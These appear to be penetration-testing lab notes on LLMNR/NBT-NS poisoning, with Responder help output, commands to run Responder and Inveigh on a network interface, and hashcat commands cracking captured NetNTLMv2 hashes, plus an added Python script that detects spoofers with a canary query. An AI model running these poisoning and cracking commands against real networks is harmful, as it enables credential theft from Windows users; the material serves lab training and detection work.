LLMNR/NBT-NS Poisoning - from Linux

MITRE ATT&CK lists this technique as T1557.001, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails.

LLMNR/NBNS spoofing combined with a lack of SMB signing can often lead to administrative access on hosts within a domain.

SMB Relay attacks

NTLMv1 and NTLMv2 are authentication protocols that utilize the LM or NT hash.

Several tools can be used to attempt LLMNR & NBT-NS poisoning:

Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.

Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.

Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.

Responder and Inveigh can both be used to attack the following protocols:

  • DNS

  • MDNS

  • NBNS

  • DHCP

  • ICMP

  • HTTP

  • SMB

  • LDAP

  • WebDAV

  • Proxy Auth

Responder also has support for:

  • FTP, POP3, IMAP, and SMTP auth

RFS85@htb[/htb]$ responder -h
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|

           NBT-NS, LLMNR & MDNS Responder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C

Usage: responder -I eth0 -w -r -f
responder -I eth0 -wrf

  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i, --ip=
                        Local IP to use (only for OSX)
  -e, --externalip=
                        Poison all requests with another IP address than
                        Responder's one.
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective when combined with
                        -r. Default: False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  -v, --verbose         Increase verbosity.

sudo responder -I ens224

Crack the captured NetNTLMv2 hash with Hashcat (mode 5600):

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

We must run the tool with sudo privileges or as root and make sure the following ports are available on our attack host for it to function best:

UDP 137, UDP 138, UDP 53, UDP/TCP 389, TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141, TCP 25, TCP 110, TCP 587, TCP 3128, multicast UDP 5355 and 5353

The -A flag puts us into analyze mode, which lets us see NBT-NS, BROWSER, and LLMNR requests in the environment without poisoning any responses. We must always supply either an interface or an IP.
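The defender's counterpart to analyze mode is a canary query: LLMNR is only consulted for names that DNS could not resolve, so no legitimate host should ever answer a query for a random name that does not exist, and any host that does answer is spoofing. The Python 3.8+ script below is an added example, not code from this page or from the Responder project; the multicast group 224.0.0.252 and port 5355 are taken from RFC 4795, and the canary name is constructed at runtime.

```python
import random, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast group and port from RFC 4795

def build_llmnr_query(name: str, txid: int) -> bytes:
    # LLMNR reuses the DNS wire format: 12-byte header, then one question (type A, class IN)
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)      # flags 0 = standard query
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)

def _skip_name(data: bytes, pos: int) -> int:
    if (data[pos] & 0xC0) == 0xC0:           # 2-byte compression pointer
        return pos + 2
    while data[pos] != 0:                    # length-prefixed labels ending in a zero byte
        pos += data[pos] + 1
    return pos + 1

def parse_llmnr_answer(data: bytes, txid: int) -> list:
    # Returns the IPv4 addresses asserted by a response to our txid, or [] if it is not one
    if len(data) < 12:                       # too short to even carry a header
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not (flags & 0x8000) or an == 0:   # 0x8000 = QR bit (response)
        return []
    pos, addrs = 12, []
    for _ in range(qd):                      # skip echoed question(s): name + type + class
        pos = _skip_name(data, pos) + 4
    for _ in range(an):
        pos = _skip_name(data, pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs

def probe(timeout: float = 2.0) -> list:
    # Multicast a query for a random name that cannot exist; every host that answers is spoofing
    name = "canary-" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz", k=12))
    txid = random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:                          # a clean network produces no replies at all
            data, (src, _) = sock.recvfrom(1024)
            if addrs := parse_llmnr_answer(data, txid):
                hits.append((src, addrs))    # src answered; addrs is where it steers traffic
    except socket.timeout:
        return hits
```

Run probe() periodically from a monitoring host on each segment; a non-empty result gives the responder's source address and the address it tried to inject, which is exactly the detection event to alert on.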

Responder config file (Responder.conf) lives in /usr/share/responder:

cd /usr/share/responder

Analyze mode only (no poisoning):

sudo responder -A -I ens224

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

hashcat -m 5600 hash_wley.txt /usr/share/wordlists/rockyou.txt

Inveigh - Overview

Inveigh can listen to IPv4 and IPv6 and several other protocols, including LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.

Inveigh Parameters


PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> (Get-Command Invoke-Inveigh).Parameters
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

The PowerShell version of Inveigh is the original version and is no longer updated.

PS C:\htb> .\Inveigh.exe

hashcat -m 5600 hash_svc_qualys.txt /usr/share/wordlists/rockyou.txt

